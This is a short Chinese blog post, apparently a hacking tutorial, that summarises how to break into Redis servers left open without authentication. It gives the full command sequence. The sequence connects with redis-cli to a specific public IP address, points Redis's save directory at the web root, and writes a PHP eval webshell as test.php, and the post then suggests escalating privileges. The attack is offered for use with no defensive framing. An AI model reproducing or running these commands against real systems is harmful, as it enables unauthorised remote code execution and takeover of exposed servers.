Redis入侵小结

如果远程redis数据库存在未授权访问漏洞,则可以直接上传shell:

 

开启redis客户端

 

输入以下命令来连接远程redis

 

redis-cli -h 125.39.185.150 -p 6379

 

接下来,在远程redis内存中设置数据:

 

config set dir /var/www/html(在内存中设置切换的web目录/var/www/html)

 

config set dbfilename test.php(在内存中的/var/www/html目录下建立一个test.php文件)

 

set xiaoma "<?php @eval($_POST[mi]);?>"(设置key-value,此时该值在Memory中)

 

save (将Memory中的key-value保存到硬盘,并保存为test.php文件)

 

四个OK就搞定了~

 

 

此时,就可以直接连shell,开始提权了~

 

redis入侵参考:

 

http://www.wooyun.org/bugs/wooyun-2015-0101465

 

http://www.wooyun.org/bugs/wooyun-2010-0105096

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值